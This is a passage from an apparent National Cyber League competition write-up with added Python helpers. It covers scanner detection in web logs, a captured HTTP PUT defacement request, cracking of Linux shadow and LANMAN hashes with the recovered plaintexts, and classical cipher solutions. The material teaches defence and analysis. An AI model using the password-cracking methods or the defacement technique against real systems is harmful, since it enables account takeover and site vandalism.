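192.0.2.15 - - [14/Jan/2012:11:40:02 -0500] "GET /phpmyadmin/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (compatible; Nikto/2.1.5)"
192.0.2.113 - - [14/Jan/2012:11:42:30 -0500] "GET /robots.txt HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; Nessus)"
192.0.2.113 - - [14/Jan/2012:11:42:31 -0500] "GET /.htaccess HTTP/1.1" 403 290 "-" "Mozilla/4.0 (compatible; Nessus)"
192.0.2.77 - - [14/Jan/2012:11:43:05 -0500] "GET / HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
192.0.2.113 - - [14/Jan/2012:11:50:11 -0500] "GET /admin/ HTTP/1.1" 403 280 "-" "Mozilla/5.0 (compatible; Konqueror/4.4; Linux) KHTML/4.4.5 (like Gecko)"
198.51.100.9 - - [14/Jan/2012:12:01:00 -0500] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/10.0"
"""

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# User-Agent substrings the common scanners send by default.
SCANNER_MARKS = [("Nikto", "nikto"), ("Nessus", "nessus"),
                 ("Nmap Scripting Engine", "nmap"), ("sqlmap", "sqlmap")]


def parse_access_log(text):
    for line in text.splitlines():
        m = COMBINED_RE.match(line)
        if m:
            yield m.groupdict()


def scanner_label(ua):
    for mark, label in SCANNER_MARKS:
        if mark in ua:
            return label
    return None


def scanner_hits(text):
    """{source ip: {scanner: time of its first request}}"""
    hits = {}
    for row in parse_access_log(text):
        label = scanner_label(row["ua"])
        if label:
            hits.setdefault(row["ip"], {}).setdefault(label, row["time"])
    return hits


def per_ip_summary(text):
    """Request and 404 counts per source; a 404-heavy source is probing paths."""
    summary = {}
    for row in parse_access_log(text):
        s = summary.setdefault(row["ip"], {"requests": 0, "not_found": 0})
        s["requests"] += 1
        if row["status"] == "404":
            s["not_found"] += 1
    return summary


def browsers_used(text, ip):
    """Non-scanner User-Agents seen from one source: the manual testing phase."""
    seen = []
    for row in parse_access_log(text):
        if row["ip"] == ip and scanner_label(row["ua"]) is None and row["ua"] not in seen:
            seen.append(row["ua"])
    return seen


if __name__ == "__main__":
    print(scanner_hits(ACCESS_LOG))
    print(per_ip_summary(ACCESS_LOG))
    print(browsers_used(ACCESS_LOG, "192.0.2.113"))
```

User-Agent matching is a convenience, not proof: all three scanners can be configured to send a browser-like string, which is why the per-source 404 count is kept alongside it.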

H. Network Data Capture

In this puzzle the player is provided a collection of captured packets.
The packets are stored in the industry standard libpcap format. As
such the contestant should utilize a libpcap compatible network traffic
analyzer, such as Wireshark or tcpdump.

The first three flags are obtainable by simply analyzing the traffic.

tcpdump -nnr NCL-R2-ND.pcap | less

tcpdump -Xnnr NCL-R2-ND.pcap | less

tcpdump -Annr NCL-R2-ND.pcap | less

The first flag question asks which HTTP Request Method is used to
deface the website. Knowing the fundamentals of HTTP should
quickly alert the player to the usage of the "PUT" method in the traffic.

15:21:47.113411 IP 192.168.245.131.58246 > 192.168.245.141.80:
Flags [P.], seq 1:235, ack 1, win 913, options [nop,nop,TS val 53158427
ecr 6560569], length 234
E...R.@.@.z............P..p.t.,t....n......
.+"..d.9PUT /admin/update.php HTTP/1.1
Host: 192.168.245.141
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: text/plain
Content-Length: 67

<body bgcolor='black'><center><img src='owned.png'></center></body>

Further review clarifies that indeed the "PUT" command was used to
deface the website.

The next two flag questions simply require further review and
searching of the network traffic. The last flag question, however, is
worth quite a large amount of points.

The question presented is what the image (now being displayed on
the defaced website) says. This requires the player to perform data
carving on the network traffic to extract the image (which is clearly
sent in the traffic).

The tcpxtract utility does a great job of extracting files from a network
stream or libpcap file.

tcpxtract -f NCL-R2-ND.pcap

Found file of type "gif" in session [192.168.245.141:20480 ->
192.168.245.131:21376], exporting to 00000000.gif
Found file of type "gif" in session [192.168.245.141:20480 ->
192.168.245.131:21376], exporting to 00000001.gif
Found file of type "gif" in session [192.168.245.141:20480 ->
192.168.245.131:21632], exporting to 00000002.gif
Found file of type "gif" in session [192.168.245.141:20480 ->
192.168.245.131:28032], exporting to 00000003.gif
Found file of type "gif" in session [192.168.245.141:20480 ->
192.168.245.131:28544], exporting to 00000004.gif
Found file of type "jpg" in session [192.168.245.141:20480 ->
192.168.245.131:28288], exporting to 00000005.jpg
Found file of type "png" in session [192.168.245.131:20480 ->
192.168.245.141:42439], exporting to 00000006.png
Found file of type "png" in session [192.168.245.141:20480 ->
192.168.245.131:36992], exporting to 00000007.png


IV. Round Three - Cryptography

The third round of the NCL competition included a number of cryptography
related challenges, ranging from simple cryptography systems to complex
steganography puzzles.

A. Scenario

Congratulations on yet another job well done! Your log analysis
reports helped us piece together what really happened during the
attack on our client's systems. In fact, you've also helped us identify
some weaknesses in our client's cybersecurity posture.

Based on the information you uncovered during the log analysis,
we've come to understand that password complexity was severely
lacking at our client's organization. Therefore, we have asked the
client to send over their password files.

Based on your log analysis work, the client identified some additional
clues that the 'not so careful' attacker left behind. Unfortunately, most
of the data the attacker left behind is encrypted or encoded in some
fashion.

Your mission is as follows:
Do some password security analysis and testing on the client's
password files
Go through the artifacts from the client's attack and see what you can
uncover

We need to secure this system, so this doesn't happen again.

Thanks again for your dedicated service and a job well done!
B. Flags

Name | Server | Value
What hashing algorithm is in use for Emily Miller's account? | 127.0.0.1 (Linux Passwords) | 100
What hashing algorithm is in use for Tom Anderson's account? | 127.0.0.1 (Linux Passwords) | 100
What hashing algorithm is in use for Amanda Williams's account? | 127.0.0.1 (Linux Passwords) | 100
What hashing algorithm is in use for Michael Davis's account? | 127.0.0.1 (Linux Passwords) | 100
What hashing algorithm is in use for Daniel Jameson's account? | 127.0.0.1 (Linux Passwords) | 100
What is the plaintext password for Emily Miller's account? | 127.0.0.1 (Linux Passwords) | 200
What is the plaintext password for Tom Anderson's account? | 127.0.0.1 (Linux Passwords) | 200
What is the plaintext password for Amanda Williams's account? | 127.0.0.1 (Linux Passwords) | 200
What is the plaintext password for Michael Davis's account? | 127.0.0.1 (Linux Passwords) | 200
What is the plaintext password for Daniel Jameson's account? | 127.0.0.1 (Linux Passwords) | 200
What is the plaintext password for Kim Jones's account? | 127.0.0.1 (Linux Passwords) | 300
What is the plaintext password for Brandon Davidson's account? | 127.0.0.1 (Linux Passwords) | 400
What is the plaintext password for Aaron Brown's account? | 127.0.0.1 (Linux Passwords) | 500
What is the plaintext password for John Smith's account? | 127.0.0.1 (Linux Passwords) | 1000
What is the plaintext password for attackers account (jbowers)? | 127.0.0.1 (Linux Passwords) | 2500
What is the plaintext password for the root account? | 127.0.0.1 (Linux Passwords) | 2500
What is the plaintext password for John Smith's account? | 127.0.0.2 (Window Passwords) | 100
What is the plaintext password for James Johnson's account? | 127.0.0.2 (Window Passwords) | 100
What is the plaintext password for Emily Miller's account? | 127.0.0.2 (Window Passwords) | 200
What is the plaintext password for Tom Anderson's account? | 127.0.0.2 (Window Passwords) | 200
What is the plaintext password for Amanda Williams's account? | 127.0.0.2 (Window Passwords) | 200
What is the plaintext password for Michael Davis's account? | 127.0.0.2 (Window Passwords) | 200
What is the plaintext password for Daniel Jameson's account? | 127.0.0.2 (Window Passwords) | 200
What is the plaintext password for Kim Jones's account? | 127.0.0.2 (Window Passwords) | 300
What is the plaintext password for Brandon Davidson's account? | 127.0.0.2 (Window Passwords) | 400
What is the plaintext password for Aaron Brown's account? | 127.0.0.2 (Window Passwords) | 500
What is the plaintext password for attackers account (nsanders)? | 127.0.0.2 (Window Passwords) | 2500
What is the plaintext password for the Administrator's account? | 127.0.0.2 (Window Passwords) | 2500
What is the first Advanced Cryptography flag? | 127.0.0.4 (Advanced Cryptography) | 300
What is the second Advanced Cryptography flag? | 127.0.0.4 (Advanced Cryptography) | 300
What is the third Advanced Cryptography flag? | 127.0.0.4 (Advanced Cryptography) | 300
What is the flag for the first Basic Cryptography puzzle? | 127.0.0.3 (Basic Cryptography) | 100
What is the passphrase for the key-pair? | 127.0.0.4 (Advanced Cryptography) | 5000
Using the previous key-pair, what is the fifth Advanced Cryptography flag? | 127.0.0.4 (Advanced Cryptography) | 5000
What is the flag for the second Basic Cryptography puzzle? | 127.0.0.3 (Basic Cryptography) | 200
What is the flag for the third Basic Cryptography puzzle? | 127.0.0.3 (Basic Cryptography) | 200
What is the flag for the fourth Basic Cryptography puzzle? | 127.0.0.3 (Basic Cryptography) | 200
What is the flag for the fifth Basic Cryptography puzzle? | 127.0.0.3 (Basic Cryptography) | 500
What is the flag for the sixth Basic Cryptography puzzle? | 127.0.0.3 (Basic Cryptography) | 600
What is the flag for the seventh Basic Cryptography puzzle? | 127.0.0.3 (Basic Cryptography) | 600
What is the flag for the eighth Basic Cryptography puzzle? | 127.0.0.3 (Basic Cryptography) | 700
What is the flag for the ninth Basic Cryptography puzzle? | 127.0.0.3 (Basic Cryptography) | 900
What is the flag for the tenth Basic Cryptography puzzle? | 127.0.0.3 (Basic Cryptography) | 2000
What is the flag found in the first Steganography challenge? | 127.0.0.5 (Steganography) | 200
What is the flag found in the second Steganography challenge? | 127.0.0.5 (Steganography) | 200
What is the flag found in the third Steganography challenge? | 127.0.0.5 (Steganography) | 300
What is the flag found in the fourth Steganography challenge? | 127.0.0.5 (Steganography) | 300
What is the flag found in the fifth Steganography challenge? | 127.0.0.5 (Steganography) | 500
What is the flag found in the sixth Steganography challenge? | 127.0.0.5 (Steganography) | 500
What is the flag found in the seventh Steganography challenge? | 127.0.0.5 (Steganography) | 5000

C. Linux Passwords

The player was provided with a complete Linux /etc/shadow file,
containing the hashed versions of all user passwords. The contestant
was then asked to find a series of flags, namely the cryptographic
hashing algorithm or the password itself.

1. Hashing Algorithms

The first five (5) flags ask simply for the hashing algorithm
used for the particular user's password hash. This is easily
obtainable from the beginning part of the hash.

Linux hashes within the /etc/shadow file start with a dollar
sign followed by a numerical value representing the hashing
algorithm, with the single exception of unsalted DES hashes,
which just provide the hash.

emiller:3e05v.ztZ8LNE:15652:0:99999:7:::
tanderson:$1$AqW8SRi1$Dd0m3hFyOI276/IHinecr0:15652:0:99999:7:::
awilliams:mQK2Y4hWq0SvY:15652:0:99999:7:::
mdavis:$5$i3uY6Gfp$ywzsyCNRs7kbKbN7Ad0SnGR7P6bVmMQ8iJ7008mrGHC:15652:0:99999:7:::
djameson:$6$iimf1wnL$T/0zG89BxF.qKzMyX7BZJCSye5x7wIQxox5dMMwWPdvpzFMOs2YkknqHdMbbdxyBN7NNNBnAh/d7YY2fRRV3k0:15652:0:99999:7:::

Flag Questions | Flag Answers

What hashing algorithm is in use for Emily Miller's account? | DES
What hashing algorithm is in use for Tom Anderson's account? | md5
What hashing algorithm is in use for Amanda Williams's account? | DES
What hashing algorithm is in use for Michael Davis's account? | SHA256
What hashing algorithm is in use for Daniel Jameson's account? | sha512

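The same identification, automated as an audit that reports which accounts still rely on the fast legacy designs: this is an added example, not part of the NCL write-up. It reads the five shadow entries quoted above plus two constructed lines (nobody, backup) for the locked-account case, and covers the crypt(3) identifiers beyond the three on the page:

```python
import re

# Hashes quoted from the /etc/shadow excerpt above, plus two constructed
# lines (nobody, backup) showing locked accounts that carry no hash at all.
SHADOW_SAMPLE = """\
emiller:3e05v.ztZ8LNE:15652:0:99999:7:::
tanderson:$1$AqW8SRi1$Dd0m3hFyOI276/IHinecr0:15652:0:99999:7:::
awilliams:mQK2Y4hWq0SvY:15652:0:99999:7:::
mdavis:$5$i3uY6Gfp$ywzsyCNRs7kbKbN7Ad0SnGR7P6bVmMQ8iJ7008mrGHC:15652:0:99999:7:::
djameson:$6$iimf1wnL$T/0zG89BxF.qKzMyX7BZJCSye5x7wIQxox5dMMwWPdvpzFMOs2YkknqHdMbbdxyBN7NNNBnAh/d7YY2fRRV3k0:15652:0:99999:7:::
nobody:*:15652:0:99999:7:::
backup:!:15652:0:99999:7:::
"""

# crypt(3) modular format: "$<id>$<salt>$<hash>". Anything else that is
# exactly 13 characters of the crypt alphabet is traditional DES crypt
# (2 salt characters followed by 11 hash characters).
PREFIXES = [
    ("$1$", "md5crypt (MD5)"),
    ("$2a$", "bcrypt"), ("$2b$", "bcrypt"), ("$2y$", "bcrypt"),
    ("$5$", "sha256crypt (SHA-256)"),
    ("$6$", "sha512crypt (SHA-512)"),
    ("$7$", "scrypt"),
    ("$y$", "yescrypt"), ("$gy$", "gost-yescrypt"),
]
DES_RE = re.compile(r"[./0-9A-Za-z]{13}")
# Fast legacy designs an audit should flag for migration.
WEAK = {"DES", "md5crypt (MD5)"}


def hash_algorithm(field):
    """Name the algorithm behind one shadow password field."""
    if field == "" or field == "*" or field.startswith("!"):
        return "locked/no password"
    for prefix, name in PREFIXES:
        if field.startswith(prefix):
            return name
    if DES_RE.fullmatch(field):
        return "DES"
    return "unknown"


def audit_shadow(text):
    """[(user, algorithm, is_weak)] for every entry in a shadow file."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        user, field = line.split(":")[:2]
        alg = hash_algorithm(field)
        rows.append((user, alg, alg in WEAK))
    return rows


def weak_accounts(text):
    return [user for user, _, weak in audit_shadow(text) if weak]


if __name__ == "__main__":
    for user, alg, weak in audit_shadow(SHADOW_SAMPLE):
        print(f"{user:12} {alg:24} {'WEAK' if weak else ''}")
```

Mixed algorithms in one shadow file, as here, usually mean the hashing policy was changed at some point but existing accounts were never forced through a password change; the audit output is the list of accounts to rotate.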
2. Cracked Passwords

Simply enough, the requirement was to crack eleven (11)
Linux passwords, and submit the cracked plaintext password
as the flag.

Of these eleven (11) passwords, the first five (5) were
dictionary terms. The next two (2) were dictionary terms
beginning with a capital letter and appended with a numerical
digit, a simple permutation. The following three (3) are a
slightly more complex permutation, two dictionary terms
separated by a numerical digit. The last two passwords were
by far the most difficult, using the standard NCL format; these
were a total of thirteen characters long, contained two
symbols, four alphabetic characters and four numerical digits.

Regardless, the entire password list was breakable with simple
tools such as John the Ripper.

Some clever permutation rules or custom dictionary files
would certainly make the last two (complex) passwords much
easier to crack. The player knew the NCL format followed a
predictable pattern, the letters "N", "C", and "L" followed by a
single hyphen, then four random alphabetical characters,
another hyphen, and then four random numerical characters.
With this information the relative number of characters
needing to be tested goes down to eight. Thus limiting the
entire maximum possible passwords to only 466,976.

Flag Questions | Flag Answers

What is the plaintext password for Emily Miller's account? | iloveyou
What is the plaintext password for Tom Anderson's account? | password
What is the plaintext password for Amanda Williams's account? | Qwerty
What is the plaintext password for Michael Davis's account? | blink182
What is the plaintext password for Daniel Jameson's account? | Whatever
What is the plaintext password for Kim Jones's account? | Password1
What is the plaintext password for Brandon Davidson's account? | Welcome2
What is the plaintext password for Aaron Brown's account? | cat8dog
What is the plaintext password for John Smith's account? | admin4you
What is the plaintext password for attackers account (jbowers)? | nCL-AluP-7398
What is the plaintext password for the root account? | nCL-lCCW-2309

D. Windows Passwords

For the Windows Passwords the participant was provided with a
dump of all of the Windows hashes from the system. The player then
simply needed to crack the provided password hash and submit the
cracked passwords as the flag.

All of the passwords were hashed using the LANMAN hash, a weak
hashing system commonly found on older Windows based systems
(though still found today for backwards compatibility). LANMAN
actually splits all passwords into seven-character sets before hashing
them, and ignores case sensitivity entirely. Because of these factors
brute forcing, or dictionary testing, LANMAN hashes is fast, efficient,
and effective.

Again, a simple password-cracking tool like John The Ripper was
efficient at breaking the passwords. Due to the weak cryptographic
hashing algorithm used, password complexity is an almost entirely
moot subject.

Flag Questions | Flag Answers

What is the plaintext password for John Smith's account? | password
What is the plaintext password for James Johnson's account? | turtles
What is the plaintext password for Emily Miller's account? | rainbows
What is the plaintext password for Tom Anderson's account? | oracle
What is the plaintext password for Amanda Williams's account? | 123436
What is the plaintext password for Michael Davis's account? | greenday
What is the plaintext password for Daniel Jameson's account? | iforget
What is the plaintext password for Kim Jones's account? | 8eady2go
What is the plaintext password for Brandon Davidson's account? | pass4you
What is the plaintext password for Aaron Brown's account? | car2truck
What is the plaintext password for attackers account (nsanders)? | nCL-k!Su-8930
What is the plaintext password for the Administrator's account? | nCL-PC8?-3891

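What "splits into seven-character sets and ignores case" means in practice is visible from the preprocessing LANMAN applies before DES is ever invoked. The following is an added example, not part of the NCL write-up; it reproduces only that preprocessing (no hashing) and puts a number on the keyspace reduction, assuming an alphabet of about 69 upper-case OEM characters (an assumption, stated in the code):

```python
def lm_halves(password):
    """Reproduce LANMAN's preprocessing: upper-case the password, encode it
    as single-byte OEM text, cut or NUL-pad it to 14 bytes, then split it
    into two 7-byte halves that are hashed independently of each other."""
    raw = password.upper().encode("latin-1", "replace")[:14].ljust(14, b"\x00")
    return raw[:7], raw[7:]


def second_half_is_padding(password):
    """Seven characters or fewer leave the second half as seven NUL bytes, so
    its hash is a known constant that reveals the short length before any
    guessing starts."""
    return lm_halves(password)[1] == b"\x00" * 7


def guesses_per_half(alphabet_size=69):
    """Upper bound on candidates for one 7-byte half (lengths 1..7). 69 is an
    assumed size for the upper-case letters, digits and symbols LM keeps."""
    return sum(alphabet_size ** n for n in range(1, 8))


def guesses_whole(alphabet_size=69, length=14):
    """What the same alphabet would cost if all 14 bytes were hashed as one
    unit, which is the property a sound design would have."""
    return alphabet_size ** length


def lm_weakness_ratio(alphabet_size=69):
    """How many times cheaper attacking the two halves separately is than
    attacking one 14-byte hash with the same alphabet."""
    return guesses_whole(alphabet_size) // (2 * guesses_per_half(alphabet_size))


if __name__ == "__main__":
    for pw in ("Pass4you", "pass4YOU", "turtles", "car2truck"):
        left, right = lm_halves(pw)
        print(f"{pw:10} -> {left!r} {right!r} short={second_half_is_padding(pw)}")
    print("halves are", lm_weakness_ratio(), "times cheaper than one 14-byte hash")
```

The ratio is the reason the write-up calls password complexity "moot" for these hashes: mixed case adds nothing, and length beyond seven only adds a second independent seven-character problem.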
E. Basic Cryptography

For each Basic Cryptography challenge the player was provided with a
file containing nothing more than an encrypted string.

1. Challenge One

The encrypted string:

Q29uZ3JhdHVsYXRpb25zISAgWW91IGhhdmUgc29sdmVkIHRoZSBmaXJzdCBCYXNpYyBDcnlwdG9ncmFwaHkgY2hhbGxlbmdlLCB0aGUgZmxhZyBpczogIE5DTC1XRkxBLTUyMzEK

The string is simply encoded using BASE64 encoding.

The decrypted string:

Congratulations! You have solved the first Basic Cryptography
challenge, the flag is: NCL-WFLA-5231

2. Challenge Two

The encrypted string:

Fjrrg, lbh unir fbyirq gur frpbaq Onfvp Pelcgbtencul punyyratr, gur
synt vf: APY-TFQY-8932

The string is encrypted using the ROT-13 cipher, a Caesar
cipher shifted by thirteen.

The decrypted string:

Sweet, you have solved the second Basic Cryptography challenge,
the flag is: NCL-GSDL-8932

3. Challenge Three

The encrypted string:

Zmlgsvi lmv yrgvh gsv wfhg, blf'ev mld ulfmw gsivv uozth uli gsv
Yzhrx Xibkgltizksb xszoovmtv, gsv uozt rh: MXO-HTLH-7428

The string is encrypted using the Atbash cipher, a substitution
cipher using a reversed alphabet.

The decrypted string:

Another one bites the dust, you've now found three flags for the
Basic Cryptography challenge, the flag is: NCL-SGOS-7428

4. Challenge Four

The encrypted string:

--- -.- .- -.-- --..-- / -. --- .-- / - .... .. ... / --- -. . / .. ... / .--- ..- ...
- / - --- --- / . .- ... -.-- / --..-- / - .... . / ..-. .-.. .- --. / .. ... ---... /
-. -.-. .-.. -....- ..-. .- .... ..- -....- ..... ....- ----- ...&

Encrypted by taking the string, converting it to Morse code, and
writing the Morse code tones out as ASCII dots and dashes.

The decrypted string:

Okay, now this one is just too easy, the flag is: NCL-FAHU-5403

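The first four challenges are all keyless transformations, so one decoder per challenge is enough to solve them mechanically. The following is an added example, not part of the NCL write-up; it embeds the four ciphertexts quoted above and decodes each (the final Morse group on the page is damaged, which the decoder reports as "?" rather than guessing):

```python
import base64
import codecs

# Ciphertexts as printed in the four challenges above.
CHALLENGE_1 = ("Q29uZ3JhdHVsYXRpb25zISAgWW91IGhhdmUgc29sdmVkIHRoZSBma"
               "XJzdCBCYXNpYyBDcnlwdG9n"
               "cmFwaHkgY2hhbGxlbmdlLCB0aGUgZmxhZyBpczogIE5DTC1XRkxBLTU"
               "yMzEK")
CHALLENGE_2 = ("Fjrrg, lbh unir fbyirq gur frpbaq Onfvp Pelcgbtencul punyyratr, gur "
               "synt vf: APY-TFQY-8932")
CHALLENGE_3 = ("Zmlgsvi lmv yrgvh gsv wfhg, blf'ev mld ulfmw gsivv uozth uli gsv "
               "Yzhrx Xibkgltizksb xszoovmtv, gsv uozt rh: MXO-HTLH-7428")
CHALLENGE_4 = ("--- -.- .- -.-- --..-- / -. --- .-- / - .... .. ... / --- -. . / .. ... / "
               ".--- ..- ... - / - --- --- / . .- ... -.-- / --..-- / - .... . / "
               "..-. .-.. .- --. / .. ... ---... / "
               "-. -.-. .-.. -....- ..-. .- .... ..- -....- ..... ....- ----- ...&")


def decode_base64(text):
    """Base64 is an encoding, not a cipher: no key, whitespace ignored."""
    return base64.b64decode("".join(text.split())).decode("utf-8")


def rot13(text):
    return codecs.decode(text, "rot_13")


def atbash(text):
    """Reverse the alphabet (A<->Z, B<->Y, ...) preserving case and non-letters."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr(ord("z") - (ord(ch) - ord("a"))))
        elif "A" <= ch <= "Z":
            out.append(chr(ord("Z") - (ord(ch) - ord("A"))))
        else:
            out.append(ch)
    return "".join(out)


MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
    "--..--": ",", ".-.-.-": ".", "---...": ":", "-....-": "-", "..--..": "?",
    "-.-.--": "!", ".----.": "'",
}


def morse_decode(text):
    """'/' separates words and whitespace separates letters; a token that is
    not in the table (such as the damaged last group) decodes to '?'."""
    words = []
    for word in text.split("/"):
        letters = [MORSE.get(tok, "?") for tok in word.split()]
        if letters:
            words.append("".join(letters))
    return " ".join(words)


def solve_first_four():
    return {1: decode_base64(CHALLENGE_1), 2: rot13(CHALLENGE_2),
            3: atbash(CHALLENGE_3), 4: morse_decode(CHALLENGE_4)}


if __name__ == "__main__":
    for n, plain in solve_first_four().items():
        print(n, plain.strip())
```

Recognising which decoder applies is the whole puzzle here: a trailing "=" and the 64-character alphabet point at Base64, preserved word lengths and punctuation at a substitution (ROT-13 or Atbash), and a vocabulary of dots, dashes and slashes at Morse.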
5. Challenge Five

The encrypted string:

O,iLimt tleeseYrexefsCta lg nl !hliNK-5ky hsFA siprat-i ilb sda h E o h etsto ai rporpycalne. o' oei: Tefa s C-UN82at G on w u tKftn BcyghhesDtst g:LM0

The string is encrypted with the Rail Fence cipher, using the
standard three rails.

The decrypted string:

Okay, this FLAG is important - it will be used as the KEY for the
next set of Basic Cryptography challenges. Don't lose it:! The
flag is: NCL-KUMN-8025

As the decrypted string value states, this flag is particularly
important. As most cryptography systems require a key, or a
shared secret, it is imperative that the player uncovers the key.
It is this flag value that will be used as the key, and therefore be
required, by most of the following flags.
6. Challenge Six

The encrypted string:

AJNG! Nijsbuq mgna kulqyosuk. Jigy mjtq hjqu sj aj. Sbu mgna
dr ILG-UAWB-3472

This time the string is encrypted with a Caesar cipher;
however, it is a keyed Caesar cipher and therefore requires the
previous flag answer as the key.

Key:

NCL-KUMN-8025

The decrypted string:

GOAL! Another flag decrypted. Only four more to go. The flag
is NCL-EGWH-3472

7. Challenge Seven

The encrypted string:

HtsLahlo n-taaph'S tgeatDw? fr?Ga iud Ks sle - I:lrT8at y?h3
e2bwNt 9iaChWf

For this puzzle no key was required, at least not in the
traditional understanding of the term key. The string is
encrypted with the Scytale tool, often referred to as a skip
transposition cipher.

Although no key is required a shared secret is needed, the
number to use for the skip. In this case the number is
simply the "flag" number: 7.

The decrypted string:

Hopefully that was a bit harder? What? It wasn't? The flag is:
NCL-SDGK-8329
8. Challenge Eight

The encrypted string:

i atnheI ts -itsTn Z e rso C8 ' uoon,t-ebroh2:e hutimfnnI3HN
Dayga7 Es oe'vFfeghLlh g

This string was encrypted with the Übchi, a German WWI
double columnar transposition cipher.

Key:

NCL-KUMN-8025

The decrypted string:

I have to be honest, I'm running out of things to say here' The
flag is: NCL-DFHE-2378

9. Challenge Nine

The encrypted string:

VWNzaywgc2FoIGdqemVhdGcgdnYgaGttIHNidnByIGRpIG5yIHJjZGkgcXRyYSBhemUgbW1qIGdqcCBMVUVSNjQgcnBueXh1YXQsIGZ0bmgnZiBsYnfigKYgIEVyeSByeW5pIHRjOiAgSE9ZLVdBUEwtODkzOAo=

This string was first encrypted with the Vigenère cipher, a
polyalphabetic modification of the Caesar cipher. It was then
BASE64 encoded.

Key:

NCL-KUMN-8025

The decrypted string:

Haha, you thought it was going to be easy when you saw
the BASE64 encoding, didn't you. The flag is: NCL-JYEB-
8938
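Challenges five, six and nine share one idea: a transposition or substitution whose secret is the earlier flag. The following is an added example, not part of the NCL write-up, implementing the three schemes so that the ciphertexts quoted above decrypt with NCL-KUMN-8025. Two conventions are assumptions verified against the page's own plaintexts: the keyed Caesar is the keyword-alphabet variant (the key's letters, de-duplicated, followed by the unused letters, with no extra shift), and the Vigenère uses only the key's letters and advances its key index on letters only:

```python
import base64
import string

KEY = "NCL-KUMN-8025"
RAIL_PLAIN = ("Okay, this FLAG is important - it will be used as the KEY for the next set "
              "of Basic Cryptography challenges. Don't lose it:! The flag is: NCL-KUMN-8025")
CHALLENGE_6 = ("AJNG! Nijsbuq mgna kulqyosuk. Jigy mjtq hjqu sj aj. Sbu mgna "
               "dr ILG-UAWB-3472")
CHALLENGE_9_B64 = ("VWNzaywgc2FoIGdqemVhdGcgdnYgaGttIHNidnByIGRpIG5yIHJjZGkgcX"
                   "RyYSBhemUgbW1qIGdq"
                   "cCBMVUVSNjQgcnBueXh1YXQsIGZ0bmgnZiBsYnfigKYgIEVyeSByeW5pI"
                   "HRjOiAgSE9ZLVdBUEwt"
                   "ODkzOAo=")


def rail_pattern(n, rails):
    """Zig-zag rail index for each of n positions (0,1,2,1,0,1,2,... for 3)."""
    idx, r, step = [], 0, 1
    for _ in range(n):
        idx.append(r)
        if rails == 1:
            continue
        if r == 0:
            step = 1
        elif r == rails - 1:
            step = -1
        r += step
    return idx


def railfence_encrypt(text, rails=3):
    pat = rail_pattern(len(text), rails)
    return "".join(ch for r in range(rails) for ch, p in zip(text, pat) if p == r)


def railfence_decrypt(cipher, rails=3):
    """Lay the rail pattern over the ciphertext positions and refill rail by rail."""
    pat = rail_pattern(len(cipher), rails)
    out = [None] * len(cipher)
    it = iter(cipher)
    for r in range(rails):
        for i, p in enumerate(pat):
            if p == r:
                out[i] = next(it)
    return "".join(out)


def keyed_alphabet(key):
    """Key letters first (duplicates and non-letters dropped), then the rest."""
    seen = []
    for ch in key.upper() + string.ascii_uppercase:
        if ch.isalpha() and ch not in seen:
            seen.append(ch)
    return "".join(seen)


def keyed_caesar_decrypt(cipher, key, shift=0):
    """Plain letter i was replaced by keyed_alphabet[(i + shift) % 26]."""
    alpha = keyed_alphabet(key)
    out = []
    for ch in cipher:
        if ch.isalpha():
            p = string.ascii_uppercase[(alpha.index(ch.upper()) - shift) % 26]
            out.append(p if ch.isupper() else p.lower())
        else:
            out.append(ch)
    return "".join(out)


def vigenere_decrypt(cipher, key):
    """Subtract the key letter (key advances on letters only, case kept)."""
    k = [ord(c) - 65 for c in key.upper() if c.isalpha()]
    out, j = [], 0
    for ch in cipher:
        if ch.isalpha():
            base = 65 if ch.isupper() else 97
            out.append(chr((ord(ch) - base - k[j % len(k)]) % 26 + base))
            j += 1
        else:
            out.append(ch)
    return "".join(out)


def solve_challenge_9():
    return vigenere_decrypt(base64.b64decode(CHALLENGE_9_B64).decode("utf-8"), KEY)


if __name__ == "__main__":
    print(railfence_encrypt(RAIL_PLAIN))
    print(keyed_caesar_decrypt(CHALLENGE_6, KEY))
    print(solve_challenge_9())
```

The rail fence round trip is included because the ciphertext printed on the page lost some spacing at its line breaks; re-encrypting the known plaintext shows the beginning of the page's string exactly, which is the kind of spot-check worth doing before trusting a transcribed ciphertext.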
10. Challenge Ten

The encrypted string:

U2FsdGVkX1/7sWQc3YpZjDfZgcKi3zB/yR6A8oBDpfVGpAhwAMd9DU27TNLqL+G8pJaPn1y88qV5hEVbVQH8XVxOjDppGWha8y0rYB6LLskAKDivCGJN5K5tWRVJX6/mq1PgHYHTDKCfvPN8wNvEpDoQvhezxmLAQ9tjaw2QlPdfl0w9fk2QAYt3d6lzvU9rEmh5QEz1eWPuqqhZi38u+lD3oX3ZhEBXDNPmjuNxX/8Jx55nnVhVR4sqL1LaoNUybZfJiIpt2kviKx7PF89XVMzebygfr2KbNTCGm4TMH/54zZdsudftueoYiUYMJHRMY4L1exZYZMJt5P8fGOGL5A==

In this case the cipher text is an ASCII-Armored AES-256-ECB
encrypted string. The leading U2FsdGVkX1 decodes to "Salted__", the
header written by OpenSSL's enc command, so the string can be decoded
with openssl enc -d -a -aes-256-ecb using the key below as the passphrase.
Current OpenSSL releases derive the key with SHA-256 by default, so
